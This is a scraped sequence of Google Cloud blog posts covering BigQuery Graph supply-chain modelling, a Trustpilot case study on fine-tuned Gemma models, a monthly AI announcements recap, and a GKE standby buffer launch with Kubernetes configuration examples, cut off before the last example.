When managing thousands of assets, complex supply chains, or global logistics networks, traditional relational databases require massive, resource-intensive SQL joins to trace dependencies. This architecture creates a latency gap between physical events and operational awareness.

Modeling with BigQuery Graph

BigQuery Graph allows you to build a digital twin of your entire supply chain within your existing data platform. By turning your physical world—items, recipes, and locations—into a searchable map of nodes and edges, you gain a new level of clarity.

1. Defining the Semantic Layer

Instead of moving data to a new database, you create a Graph View over your existing tables. This tells BigQuery exactly how your tables relate to one another.

Query Language:

code_block: <ListValue: [StructValue([('code', '# Build the Graph Nodes & Edges\r\nCREATE or REPLACE PROPERTY GRAPH `restaurant.bombod`\r\nNODE TABLES (\r\n `restaurant.item` label item properties all columns,\r\n `restaurant.location` label location properties all columns,\r\n `restaurant.itemlocation` label itemlocation properties all columns\r\n)\r\nEDGE TABLES (\r\n `restaurant.bom`\r\n KEY(bomKey)\r\n SOURCE KEY (childItemLocation) REFERENCES `restaurant.itemlocation`(itemLocationKey)\r\n DESTINATION KEY (parentItemLocation) REFERENCES `restaurant.itemlocation`(itemLocationKey)\r\n LABEL consists_of properties all columns\r\n);'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9404bf640>)])]>

Image of a fictitious restaurant supply chain modeled using BigQuery Graph

Precision in practice

How does this change daily operations? It moves the business from panic to precision.

Surgical recalls: If a supplier reports a Listeria breakout, you walk the graph forward to find exactly which menu items in which specific restaurants are affected.
Weather risk analysis: When a hurricane threatens a distribution center, you don't see a list of stores; you see the blast radius. You identify the locations critically dependent on that hub and reroute supplies.

2. Executing the search

Graph Queries are a new tool for modelers and data scientists to query their data - it simplifies complex multi-domain data concepts and simplifies querying and makes data analysis a simpler more natural representation of problem articulation. For example: If I want to know which all locations handle chicken I could run a graph query as shown below:

To investigate a specific complaint or risk, you run a search on the model using graph query language.

Graph Query Language

code_block: <ListValue: [StructValue([('code', "# Navigate to the source of a specific ingredient issue\r\nGraph restaurant.bombod\r\nMATCH (a:itemlocation)-[c:consists_of]->(b:itemlocation) \r\nWHERE b.itemKey LIKE '%Chicken%'\r\nRETURN to_json([to_json(a),to_json(c),to_json(b)]) as result"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9404bfc10>)])]>

Source of a foul odor - modeled as a graph

Building for the future

To get the most out of your digital twin, follow these guiding principles:

Focus on structure: Use graphs for relationships and dependencies; keep daily sales totals in relational tables.
Clean your keys: Spend time on data engineering; a graph is only as strong as its connections.
Capture edge properties: Store metadata like lead times or shipping costs directly on the edges to increase the model's utility.

Conclusion

The restaurant industry has outgrown the relational way of treating business data only as a list. By building inter-domain relationships as a digital twin with BigQuery Graph, you move from reactive problem solving to proactive modeling. It’s time to stop managing your network with a list and start seeing the connections in seconds.

Get started today

Check out the tutorial here
Visit the BigQuery documentation: find overview and quickstart guide.
Share your feedback: join our community, and get your questions answered via bq-graph-preview-support@google.com.
Related blog: Introducing BigQuery Graph

How Trustpilot built a real-time architecture for data enrichment using Gemma

Mon, 01 Jun 2026 16:00:00 +0000

Processing millions of user reviews in real-time, under strict latency and cost constraints, is no easy task. Trustpilot has been doing exactly that with custom machine learning since long before large language models (LLMs) were cool. Now, as the company transitions its core stack to generative AI, here is a look at how we teamed up to build a high-volume streaming pipeline using fine-tuned Gemma models.

Powering deep review intelligence at scale

Trustpilot’s core business relies on delivering deep, actionable review intelligence. As a platform championing transparency and genuine feedback, it must safeguard data integrity and maximize value. This means extracting every drop of metadata from incoming reviews — making LLMs the perfect tool for the job.

These models excel at parsing messy, human-written text to run named entity recognition (NER), categorize business domains, score sentiment, and pinpoint customer intent. But while prompting an LLM for a few reviews is easy, processing millions in real-time without blowing up costs is a massive engineering hurdle.

Why fine-tune an open model?

When pursuing such a big task, why isn’t just plugging into a powerful, off-the-shelf, frontier model like Gemini the right approach? For a pipeline this critical to the core business, closed models are rarely the best option. Instead, by fine-tuning open-weight models like Gemma, Trustpilot takes full ownership of their AI strategy. Here’s how:

Total model independence: By owning its models, Trustpilot ensures it controls the retraining lifecycle, completely freeing it from a third-party vendor's update schedule or sudden API changes.
Predictable economics: Shifting from a variable per-token pricing model to fixed infrastructure costs makes running millions of predictions financially viable and optimizable.
Expanding MLOps capabilities: Building these models in-house enables Trustpilot to bake in the "secret sauce" of its review intelligence while building competencies on open-weight models.
Architectural continuity: Standardizing on an open-weight lineage preserves the company’s ability to leverage the future iterations of the base model. This enables performance gains with minimal engineering overhead.

Rather than deploying one massive model, Trustpilot built a suite of highly specialized models using the lightweight google/gemma-2-9b as a base.

To get heavy-weight performance from a small footprint, the company employed a consensus annotation over a stratified sample of the Trustpilot review corpus, using a selection of teacher models from the Gemini 2.0/2.5 Pro/Flash family. This process generated high quality training datasets for specialized tasks like topic classification, NER, and sentiment extraction.

The datasets were subsequently used to fine-tune a targeted lineup of custom models that considerably outperformed the legacy solution and delivered accuracy just a couple percentage points lower than the teacher models’ consensus.

System architecture

This architecture was built on top of Dataflow and Gemini Enterprise Agent Platform Endpoints, which play together very nicely because of the out-of-the-box VertexAIModelHandlerJSON.

We decoupled business logic and raw LLM inference by creating two separate endpoints:

The classifier: a FastAPI-based endpoint that handles the messy stuff, pre/post-processing, prompt templating, and chaining.
The LLM: A separate Agent Platform endpoint dedicated strictly to serving the Gemma model via vLLM.

This approach keeps the Dataflow job clean and ensures the LLM endpoint sticks to what it does best: generating text. Plus, it allows Trustpoint to scale them independently based on the traffic.

Performance tuning

To get the most out of the vLLM-based Agent Platform endpoints, Trustpilot focused on squeezing every bit of performance out of the entire pipeline, especially from the A2 VMs using A100 GPUs. It also leveraged the customized and optimized version of vLLM maintained by Gemini Enterprise Agent Platform.

A focus of our performance tuning involved optimizing the vLLM backend configuration to prevent processing bottlenecks. By carefully adjusting the engine parameters, selecting the appropriate data type, and enabling useful settings such as prefix caching, we ensured the models could smoothly handle high streaming volumes.

Together, we also created a reusable load testing framework to find the optimal serving capacity for a vLLM inference server and to sketch its performance profile. This enabled setting a baseline for needed infrastructure, and tuning the auto-scaling setup using the request count-based metric. In addition, a new metric using vLLM number of requests waiting could be even better for this.

Challenges

While building this setup, Trustpilot encountered a few notable hurdles:

Private networking: The architecture aimed to be fully isolated by using private endpoints and Private Service Connect, but this wasn’t possible because there was no native support for direct private communication between distinct endpoints.
Deployment observability and reliability: Endpoint deployments can be slow or opaque, which occasionally requires extra troubleshooting when entering an unhealthy state. Trustpilot is still working closely with the Gemini Enterprise Agent Platform product team to help shape future observability features and platforms.
GPU Scarcity: Securing A100 GPUs in the EU region is tough, so on-demand VMs are often a no-go. Instead, leveraging reservations is preferable but balancing them between development, production, training, inference, and experiments can be quite challenging.

The results

Together with Google Cloud, Trustpilot leveraged the full potential of Gemma on Gemini Enterprise Agent Platform to process millions of reviews a day in near real-time. In doing so, they achieved Gemini-like performance for a fraction of the cost. This ultimately allowed the Trustpilot Business Platform to turn millions of everyday customer reviews into instant, actionable insights. You can read more on the Trustpilot Medium blog post.

^{This blog post was written by Assulan Nurkas (Trustpilot), Subu Ramasubramanian (Trustpilot), Konrad Stanek (Trustpilot), Dario Banfi (Google) and Michael Cohen Hjertén (Google) based on the work done during the joint project at the end of 2025.}

What Google Cloud announced in AI this month

Mon, 01 Jun 2026 16:00:00 +0000

Editor’s note: Want to keep up with the latest from Google Cloud? Check back here for a monthly recap of our latest updates, announcements, resources, events, learning opportunities, and more.

We’ve had a busy month! Between announcing Gemini Spark and Gemini 3.5 at Google I/O – and unveiling Google AI Threat Defense, our latest AI-powered cybersecurity solution, we had a lot to share with Google Cloud customers. Keeping up with the latest news takes time, so we gathered the most important announcements, thought leadership, and technical guides in one place to help you quickly catch up.

To learn more about our I/O announcements, here’s everything you need to know for Google Cloud customers, and top news for startups.

Top announcements

Introducing Google AI Threat Defense to help you outpace the adversary: Google Cloud is introducing a comprehensive AI-powered cybersecurity solution — Google AI Threat Defense — an always-on autonomous security platform. Learn more here.

Gemini 3.5: Our latest family of models combines frontier intelligence with action – starting with Gemini 3.5 Flash.
Gemini Omni: Our new model is a leap forward in world understanding, multimodality, and editing, letting you generate any output from any input, starting with video.
Google Antigravity: Google Antigravity’s expanded capabilities and new integration with Agent Platform bring agentic development to your entire organization.
Gemini Spark: For Gemini Enterprise and Workspace customers, Gemini Spark is your 24/7 personal AI agent that helps you work more efficiently by autonomously taking action on your behalf, under your direction.
Google Workspace: Google Pics, our new image generation and editing tool, and new voice features in Gmail, Docs and Keep, help reimagine how you work.
Managed Agents API on Agent Platform: Allows developers to build and run custom agents inside secure, Google-hosted environments that seamlessly integrate with Agent Platform.
CodeMender: A powerful AI security agent provided through Agent Platform, CodeMender can help find and fix vulnerabilities in your code.

Nano Banana 2 and Nano Banana Pro are generally available: Available today via Gemini Enterprise Agent Platform, organizations are already putting the models to work. Learn more here.

Thought leadership (editor’s pick):

Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs: Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief strategy officer, Wiz. While threat actors have seen gains from the adversarial misuse of AI, Google and Wiz are tackling these challenges head-on by combining Wiz's deep cloud telemetry with Google's world-class AI and quantum research to help CISOs and their organizations meet the needs of the agentic enterprise era. Read more here.

News you can use:

What Google I/O '26 means for developing agents on Google Cloud: Dig deep into how Gemini Enterprise Agent Platform and the new developer tools shared at I/O fit together, unpack the spectrum of choice for building, and share what we’d actually try first. Learn more here.

Five must-have guides to move agents into production with Gemini Enterprise Agent Platform: Here is a look back at our five-part series covering the architecture patterns and best practices you need to move your agents into production. Learn more here.
How to build an AI-ready security program for the public sector: From industrial control systems to decades-old municipal databases, here’s our CISO guidance to prep AI-ready security programs for the public sector. Learn more here.

Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, Cool stuff customers built.

aside_block: <ListValue: [StructValue([('title', '$300 in free credit to try Google Cloud AI and ML'), ('body', <wagtail.rich_text.RichText object at 0x7fa923f779a0>), ('btn_text', 'Start building for free'), ('href', 'http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/'), ('image', None)])]>

April

We hosted Google Cloud Next in Las Vegas on April 22, announcing incredible innovations from Gemini Enterprise Agent Platform to our eight-generation TPUs. We also expanded the Gemini Enterprise app in collaborative ways – now, with new features like Projects, you can work side-by-side with your agents and colleagues.

If you missed the livestream, take a look at our Day 1 recap. It’s been incredible to see how customers have been applying AI in thousands of ways — so far, we’ve counted more than 1,300 examples.

Top announcements

1. Gemini Enterprise Agent Platform: Our new, comprehensive platform to build, scale, govern, and optimize agents. Moving forward, all Vertex AI services and roadmap evolutions will be delivered exclusively through the Agent Platform, rather than as a standalone service, to power the next generation of agent development.

The platform is designed around four core pillars — build, scale, govern, and optimize — that allow teams to collaborate seamlessly. Learn more about Agent Platform here.

2. Gemini Enterprise app has all the key components to let teams discover, create, share, and run AI agents in a single environment. At Next ‘26, we introduced several new capabilities in the Gemini Enterprise app:

Agent Designer uses the same no-code agent designer experience of Agent Platform and lets employees build sophisticated schedule- and trigger-based agents using any enterprise connector. It gives you a virtual flowchart of your agent, allowing you to inspect, test, and approve workflows, ensuring total transparency for executing critical business processes.
Long-running agents are designed to execute complex business processes. They can work autonomously in secure cloud sandboxes, giving agents the ability to orchestrate business logic, write code to build custom tools, and complete multi-step work like reconciliation activities or sales prospect sequencing — without needing constant prompting.
Inbox in Gemini Enterprise provides a central location to monitor, guide, and help manage all of your agent activity, including your long-running agents. Notifications are intuitively categorized into actionable groups like "Needs your input," "Errors," and "Completed.”
Projects create a dedicated space where the agent’s memory is confined to the files and conversations your team adds. By connecting it to data sources including Google Drive, NotebookLM, and Google Group Chats, the agent becomes an expert on a specific topic and can provide team members daily briefings or status updates without digging through months of documents.
Skills create simple shortcuts using an “@” mention for repetitive tasks such as applying brand guidelines, formatting a report, and accessing specific data.
Canvas gives our customers an interactive editor directly within Gemini Enterprise. It allows teams to easily create and edit Docs and Slides, and even export to Microsoft 365 files, within the same experience.
Agent Gallery provides access to third-party agents from partners like Adobe, Atlassian, Lovable, and ServiceNow, and is adding more third-party connectors for Asana, Mailchimp, Workday, and more. These integrations enable your agents to retrieve data and execute tasks with your systems-of-record.

3. AI Hypercomputer: Designed specifically for demanding AI workloads, our AI Hypercomputer is an advanced, purpose-built architecture that unites performance-optimized hardware for compute, storage, networking, open software and machine learning frameworks — as well as flexible consumption models — into a single, integrated system. We are announcing innovations at every layer of the AI Hypercomputer:

TPU 8t, optimized for training, uses breakthrough Inter-Chip Interconnect (ICI) technology to scale up to 9,600 TPUs and 2 PB of shared, high-bandwidth memory in a single superpod. It achieves 3x the processing power of Ironwood and delivers up to 2x more performance/Watt.
TPU 8i, optimized for inference, uses our new Boardfly topology to directly connect 1,152 TPUs in a single pod. It features 3x more on-chip SRAM compared to previous versions to host larger KV caches entirely on-silicon and integrates a specialized Collectives Acceleration Engine. Taken together, TPU 8i delivers 80% better performance per dollar for inference than the prior generation, enabling millions of concurrent agents to run cost-effectively.

4. The Agentic Data Cloud: A new data architecture built for the speed and scale of agentic AI. The Agentic Data Cloud delivers an AI-native architecture, allowing agents to perceive, reason, and act on your behalf in real-time, including:

Cross-Cloud Lakehouse, standardized on Apache Iceberg, is our Lakehouse that enables you to leave your data in AWS or Azure (coming later this year) while querying it instantly — without the friction of vendor lock-in or the cost of data movement
Knowledge Catalog constructs a unified, dynamic context graph of your entire business enabling you to ground agents in all of your business data and semantics. With Smart Storage and the Object Context API, files in Google Cloud Storage are instantly tagged and enriched with metadata before an agent touches them. Then our Knowledge Engine uses Gemini to autonomously tag, define logic and instantly map complex relationships across your entire enterprise, providing the semantic definition your agents have been missing.

5. Protecting the agentic enterprise: Security built for the AI era. Our full-stack AI approach, from the chips to the models, gives you a competitive advantage with better integration and velocity to help protect customers. Not only can Google action insights from the world’s largest threat observatory and Mandiant frontline experts, but we also bring cutting-edge insights and breakthroughs from Google DeepMind, to help make your platforms more secure.

Agentic defense: Three new agents in Google Security Operations can help hunt threats, engineer detections, and provide context on third parties. You can build your own security agents with remote Google Cloud model context protocol (MCP) server support for Google Security Operations, now generally available. You can also access the MCP server client directly from the Google Security Operations chat interface, available in preview.
Protecting AI and cloud apps across any infrastructure with Wiz: Newly expanded AI coverage helps build secure agents across clouds and AI studios. New AI-Bill of Materials in development tools can help secure AI-generated code and mitigate the risk of shadow AI. Learn more.
Securing agents and the agentic web: Model Armor can integrate with Agent Gateway, and new Agent Identities provide more layers of defense against shadow AI. Google Cloud Fraud Defense, the next evolution of reCAPTCHA, offers agent-specific capabilities that can help secure the agentic web as well as the entire user and customer journey.
Trusted Cloud: We’re simplifying permissions with modern IAM, and advancing Google Cloud security with new capabilities in Security Command Center plus new innovations in data and network security.
New partner-supported workflows for Google Security Operations: This new robust cohort of partner integrations includes partners developing their own agentic security operations centers (SOCs).

You can catch up on all our security announcements from Next ‘26 here.

News you can use

Guide to prompting Gemini 3.1 Flash TTS (text-to-speech): The new TTS model introduces a high level of controllability by allowing you to steer the delivery using more than 200 audio tags. We'll share how to get strong results from the model, whether you are building accessible gaming soundtracks, banking systems, or audiobooks. Learn more about the model here.
Ultimate prompting guide for Lyria 3 models: Lyria 3, Google's family of music-generation models, is designed to give you granular control over vocals, instrumentation, and arrangement. So we spent weeks testing against every musical genre and use case we could imagine. We put together this guide to share exactly what we learned and how you can get the best results.
How to find the sweet spot between cost and performance: This guide will walk you through Google Cloud's flexible gen AI infrastructure options, showing you how to find that sweet spot on the efficient frontier between cost and performance. We'll start with the foundational pay-as-you-go (PayGo) models and then explore how to layer on more specialized options to build a robust and cost-effective gen AI strategy.
Essential AI and cloud security now on by default: To support the next generation of AI innovators, we are offering on by default essential AI security and cloud security in Security Command Center Standard.
Securing AI inference on GKE with Model Armor: Here’s how to secure AI inference on Google Kubernetes Engine with Model Armor and high-performance storage.
Cloud CISO Perspectives: AI, security, and the workforce of the future: You can’t bring traditional security to an AI fight, so how do we defend against AI-powered attacks, boost defenders with AI, and secure AI use? Drop in on this RSA Conference fireside chat between Francis deSouza, Google Cloud COO and President, Security Products, and Nick Godfrey, senior director, Office of the CISO.

March

March was a busy month for our AI teams. We launched Gemini Embedding 2, rolled out a highly cost-effective Veo 3.1 Lite model, and officially welcomed the Wiz team to Google Cloud to help redefine security in the AI era.

Alongside these launches, we created comprehensive guides to help you get the most out of these models, from prompting formulas for Nano Banana 2, to practical advice for optimizing your TPU training. Here’s a quick look at the latest news and resources to help your team build what’s next.

Top hits:

Gemini Embedding 2: Our first natively multimodal embedding model: Gemini Embedding 2 is our first natively multimodal embedding model that maps text, images, video, audio and documents into a single embedding space, enabling multimodal retrieval and classification across different types of media — and it’s available now in public preview.
Build with Veo 3.1 Lite, our most cost-effective video generation model: This model empowers developers to build high-volume video applications, at less than 50% of the cost of Veo 3.1 Fast, but with the same speed. This rounds out the Veo 3.1 model family, giving developers flexibility based on needs. For Cloud customers, it’s now available on Vertex AI.

Here’s a fun bonus: Check out our ultimate prompting guide for Veo 3.1 to get started.

Welcoming Wiz to Google Cloud: Redefining security for the AI era: Google has completed its acquisition of Wiz, a leading cloud and AI security platform. The Wiz team will join Google Cloud, and we will retain the Wiz brand. With the addition of Wiz, we will provide customers with a comprehensive platform to secure their cloud and hybrid environments, as well as accelerate threat prevention, detection, and response.
Gemini 3.1 Flash Live: Making audio AI more natural and reliable: We’ve improved 3.1 Flash Live’s overall quality, making it more reliable for developers and enterprises to build voice-first agents that can complete complex tasks at scale. On ComplexFuncBench Audio, a benchmark that captures multi-step function calling with various constraints, it leads with a score of 90.8% compared to our previous model.

News you can use:

The ultimate Nano Banana prompting guide: This is a must-read for anyone working with Nano Banana. We spent weeks testing Nano Banana 2 and Nano Banana Pro against every use case we could imagine to test its limits. We put together this guide to share exactly what we learned and how you can get the best results. Here’s an example formula: [Reference images] + [Relationship instruction] + [New scenario]

A developer’s guide to training with Ironwood TPUs: In this guide, we hear from Lillian Yu, CPA, CA , Product Strategy and Operation, and Liat Berry, Product Manager, on five strategies within the JAX and MaxText ecosystems designed to help developers refine training efficiency and hit peak performance on Ironwood hardware.
How to build production-ready AI agents with Google-managed MCP servers: In this guide, we anchor on a specific example. Cityscape is a demo agent built with Google's Application Development Kit (ADK) that turns a simple text prompt — like "Generate a cityscape for Kyoto" — into a unique, AI-generated city image. Check out the guide to learn more.

February

In February, we’re giving developers more reasoning power with Gemini 3.1 Pro and Claude 4.6, and faster creative scaling with Nano Banana 2. We’re also opening up new training programs and step-by-step guides to help you tackle the hardest parts of the AI lifecycle, from capacity planning to mounting defenses against AI-powered attacks.

Here’s a rundown of our latest news, tools, and resources to help you build what’s next.

Top hits

Pro-level image generation gets faster and more accessible with Nano Banana 2: To build creative that stands out, you need models that naturally integrate into your workflows and scale with ease. Check out our blog to see how this comes to life (and how customers are putting the model to work).

Introducing Gemini 3.1 Pro on Google Cloud: Gemini 3.1 Pro is a clear step forward in reasoning, designed to solve tougher problems, giving you the reasoning depth your business needs. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Announcing Claude Opus 4.6 and Claude Sonnet 4.6 on Vertex AI: Now generally available on Vertex AI, explore our sample notebook to get started and visit our documentation for comprehensive pricing and regional availability details.
New AI threats report: Distillation, experimentation, and integration: John Hultquist, chief analyst, Google Threat Intelligence Group, details what security leaders should know from our newest AI threat report on experimentation, integration, and distillation attacks.

News you can use

A developer's guide to production-ready AI agents: To help developers work through these challenges, we've published a collection of guides covering the full agent lifecycle. These resources first appeared during Kaggle’s 5 days of AI Agents Intensive, and they’ve proven so popular and useful, we wanted to make sure a wider audience had access, as well.
Gemini Enterprise Agent Ready (GEAR) program now available: We opened the Gemini Enterprise Agent Ready (GEAR) learning program to everyone. As a new specialized pathway within the Google Developer Program, GEAR empowers developers and pros to build and deploy enterprise-grade agents with Google AI.
Your guide to Provisioned Throughput (PT) on Vertex AI: Check out this deep-dive blog designed to show you the resources available to you today on Vertex AI, and how you can get started capacity planning.
How AI can boost defenders, from defense in depth to the cyber kill chain (Q&A): We know that defenders are also developing powerful AI tools, but what’s still unknown is what it could mean for enterprise software ownership if companies have to constantly mount AI-directed defenses at AI-powered attacks?

Janurary

We used to have to learn the language of computers. In 2026, they’re learning ours.

We kicked off the year by exploring the future of agentic commerce, where AI agents navigate the web to find and buy products for us. Our leaders call this the "invisible shelf" — a world where commerce isn't tied to a specific website. To make this reality scalable, we announced the Universal Commerce Protocol (UCP), a shared language that allows agents and retailers to understand each other.

We brought that same fluency to our creative and technical tools:

Updates to Veo 3.1 allow creators to use simple inputs — like reference images — to generate precise, mobile-ready video.
Natural language queries: With Comments to SQL in BigQuery, we’re removing the language barrier to data. Engineers can now write queries by describing their intent in natural language, prioritizing the question over the code.

Let’s dive in.

Top hits

1. Gemini Enterprise for Customer Experience (CX): Specifically built for agentic retail, this platform transforms fragmented search, commerce and service touch points into one seamless journey — whether you need a shopping assistant, a support bot, agentic search or help with merchandising.

2. We announced Universal Commerce Protocol (UCP): A new open standard for agentic commerce that works across the entire shopping journey — from discovery and buying to post-purchase support. UCP establishes a common language for agents and systems to operate together across consumer surfaces, businesses and payment providers. So instead of requiring unique connections for every individual agent, UCP enables all agents to interact easily. UCP is built to work across verticals and is compatible with existing industry protocols like Agent2Agent (A2A), Agent Payments Protocol (AP2) and Model Context Protocol (MCP).

3. We updated Veo 3.1, including improvements to Ingredients to Video and Portrait mode: Veo is getting more expressive, with improvements that help you create more fun, creative, high-quality videos based on ingredient images, built directly for the mobile format. This includes:

Improvements to Veo 3.1 Ingredients to Video, our capability that lets you create videos based on reference images.
Native vertical outputs for Ingredients to Video (portrait mode) to power mobile-first, short-form video creation.
State-of-the-art upscaling to 1080p and 4K resolution 1 for high-fidelity production workflows.

These updates are launching in the Gemini app, YouTube, Flow, Google Vids, the Gemini API and Vertex AI.

4. Vibe querying with comments-to-SQL: Crafting complex SQL queries can be challenging. Often, engineers simply want to express their data needs in plain English directly within their SQL workflow. That’s why we’re introducing Comments to SQL in BigQuery. This feature makes writing queries using natural language – ‘vibe querying’ – a reality. Learn more in the blog.

News you can use

Mastering Gemini CLI: Your complete guide from installation to advanced use-cases: We’ve teamed up with DeepLearning.ai and are excited to announce a free course – Gemini CLI: Code & Create with an Open-Source Agent. This course isn’t just for developers; we dive into practical use cases for various tasks such as data analysis, content creation, and personalized learning.
How Google SREs use Gemini CLI to solve real-world outages: In this article, we’ll delve into real scenarios that Google SREs are solving today using Gemini 3 (our latest foundation model) and Gemini CLI—the go-to tool for bringing agentic capabilities to the terminal.
Getting started with Gemini 3: Deploy your first Gemini 3 app to Google Cloud Run: In this blog, we will show you how to vibe code your first app—which leverages the Gemini 3 Flash Preview model and deploy it as a publicly accessible URL on Google Cloud Run. Google AI Studio lets you go from idea to app quickly by using natural language to generate fully functional apps using the power of Gemini 3.
Practical guidance: Building with the Secure AI Framework (SAIF) on Google Cloud: We know that security and data privacy are the top concern for executives when evaluating AI providers, and security is the top use case for AI agents in a majority of industries. To help you build AI boldly and responsibly, here’s our guide to developing AI with the Secure AI Framework (SAIF) on Google Cloud.
The truths about AI hacking that every CISO needs to know (Q&A): How will AI boost threat actors? And what can chief information security officers do about it? Google’s Heather Adkins, vice-president, Security Engineering, explores how securing the enterprise is about to change.

Introducing the GKE standby buffer: Improve node startup times without blowing your budget

Mon, 01 Jun 2026 16:00:00 +0000

Application owners and platform engineers have long faced a difficult choice: spend excessively by over-provisioning to guarantee quick startups, or minimize costs but endure slow cold starts.

We are excited to announce a solution to this compromise: Google Kubernetes Engine standby buffers. This builds on the launch of GKE active buffers earlier this year, a native version of the Kubernetes CapacityBuffers API that makes it easy to provision readily available capacity to handle traffic spikes, delivering near-zero startup latency for new pods. However, active buffers still impose a trade-off between performance and cost. New GKE standby buffers help by maintaining a low-cost, suspended capacity buffer for your GKE clusters. With a cost overhead in the low single-digit percent, GKE standby buffers help you achieve near-immediate scheduling for your workloads with negligible cost overhead. This is useful for all kinds of workloads — general-purpose, agentic, and everything in between.

Under identical traffic loads, the cluster without standby buffers suffered severe latency spikes, with P50, P95, and P99 metrics trapped between 4 and 6 minutes. Conversely, the cluster with standby buffers maintained a P50 latency of just single-digit seconds, while its P95 and P99 metrics briefly peaked at one minute before quickly normalizing to single-digit seconds. Both setups exhibited a similar allocatable core cost, making the buffered approach far more efficient.

The problem: High costs and latency

Traditionally, autoscaling with standard Kubernetes has been effective but slow. Traffic surges or batch jobs require cluster autoscalers to provision fresh nodes, leaving Pods in a pending state. To circumvent delays, you have to resort to clunky workarounds like lowering your Horizontal Pod Autoscaler (HPA) thresholds or managing so-called balloon pods. These workarounds are expensive:

Managing balloon pods is operationally complex, requiring manual configuration and ongoing maintenance of priority classes and resource requests to ensure they function correctly.
Lowering the HPA threshold adds empty (wasted) space that linearly scales with the size of the node pool.

Both GKE active and standby buffers allow capacity to be defined declaratively, removing the need for clunky and operationally heavy workarounds.

In addition, GKE standby buffers lower infrastructure costs by storing the node’s state to disk, releasing compute and memory costs and keeping only persistent disk and IP address costs. Then, combined with an active buffer, you can achieve near-instant pod scheduling that has similar performance to over-provisioning, but at a very affordable price.

Active and standby buffers working together

All GKE capacity buffers operate on a principle similar to video streaming on platforms like YouTube. By proactively attempting to provision and manage available capacity ahead of impending demand (much like pre-downloading video content) GKE helps to ensure that resources are readily available when they’re needed.

With today’s launch, the two types of capacity buffers can work in harmony:

Active buffer: Cluster Autoscaler works to reserve enough capacity for a predefined amount of pods on existing cluster nodes, and, if needed, provisions extra nodes. Select this ready-to-use buffer to provide capacity to your most latency-sensitive workloads.
Standby buffers: Nodes are pre-provisioned and fully initialized with necessary components like Kubernetes DaemonSets, and given time to preload images, but are then suspended, while the underlying compute capacity is released to save costs. When demand spikes, these nodes resume 2-3x faster than creating a fresh node, bridging the gap between cold starts and always-on capacity.

The active buffer covers the initial spike until standby buffers resume. The system prioritizes refilling the active buffer from the standby buffer. The standby buffer handles an extended load and protects against slower node cold starts. As standby buffers refill, they initially kick into an active state for a configurable amount of time before they are suspended, providing a boost of active capacity during sustained traffic loads.

Early benchmarks

In our tests, using standby buffers enabled us to deliver sub-second Agent Sandbox scheduling latency for up to 90% lower cost compared to complete overprovisioning.

Optimized for business needs

Businesses are under constant pressure to optimize resource consumption while streamlining operations. Recognizing that organizations need smarter tools to manage sporadic and spikey workloads, we worked hard to deliver standby buffers quickly. Now, whether you’re running agents, batch jobs, CI/CD pipelines, game servers, or spiky workloads, GKE capacity buffers allow you to dynamically balance performance and cost. You can finally define your "insurance policy" against traffic spikes without paying a high premium for it. With GKE standby buffers you can:

Circumvent cold starts: Nodes suspended by standby buffers resume 2-3x faster than provisioning fresh nodes, reducing pod scheduling latency during traffic spikes and sustained traffic load.
Enjoy lower costs: A standby buffer incurs a fraction of the cost of active capacity because the underlying VM is suspended. You pay for storage and an IP address, rather than for full compute-hours.
Gain declarative control: Replace complex balloon pod workarounds with the simple, native declarative CapacityBuffers API, explicitly stating how much headroom you need, and letting GKE handle the rest.

“Using GKE standby capacity buffers has lowered our time-to-ready from several minutes to 30 seconds at a very affordable price.”
- Pedro Spagiari, Chief Architect at Unico

Get started

Ready to improve your performance and save on costs?

Start by defining a CapacityBuffer resource in your cluster to specify your target buffer size.
Try balancing between standby buffers to reduce pod scheduling latency for sustained loads, and active buffers to address immediate unpredictable capacity needs.

Let’s look at an example of how to configure buffers for a Deployment while also using custom ComputeClasses.

Basic setup

Beginning with some basic setup, create a namespace:

code_block: <ListValue: [StructValue([('code', 'apiVersion: v1\r\nkind: Namespace\r\nmetadata:\r\n name: my-namespace'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa940211be0>)])]>

Then, create a custom ComputeClass (optional):

code_block: <ListValue: [StructValue([('code', 'apiVersion: cloud.google.com/v1\r\nkind: ComputeClass\r\nmetadata:\r\n name: my-ccc\r\n namespace: my-namespace\r\nspec:\r\n # Buffers will also be created according to these priorities \r\n priorities:\r\n - machineFamily: n4\r\n - machineFamily: n4d\r\n - machineFamily: c4\r\n - machineFamily: c4d\r\n nodePoolAutoCreation:\r\n enabled: true'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa940211250>)])]>

Define the buffer unit size

You can use a PodTemplate as a reference for the buffer unit size. You can also create a buffer for a specific deployment or any object that defines scale subResource.

code_block: <ListValue: [StructValue([('code', '# Defines the resource requirements for one unit of buffer.\r\napiVersion: v1\r\nkind: PodTemplate\r\nmetadata:\r\n name: my-buffer-unit-template\r\n namespace: my-namespace\r\ntemplate:\r\n spec:\r\n terminationGracePeriodSeconds: 0\r\n tolerations:\r\n # Optional: Ensures buffer pods can land on any node.\r\n - key: "node-role.kubernetes.io/master"\r\n operator: "Exists"\r\n effect: "NoSchedule"\r\n containers:\r\n - name: buffer-container\r\n image: registry.k8s.io/pause:3.9\r\n resources:\r\n requests:\r\n cpu: "1"\r\n memory: "1Gi"\r\n limits:\r\n cpu: "1"\r\n memory: "1Gi"\r\n # Optional: Using buffers with a custom ComputeClass / \r\n # controls the properties of the nodes GKE provisions. \r\n nodeSelector:\r\n cloud.google.com/compute-class: my-ccc'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa940211b80>)])]>

Create buffers

Lastly, create a CapacityBuffer object by referring to our PodTemplate. Here, you create a standby buffer of 50 CPUs and 50 GB of RAM:

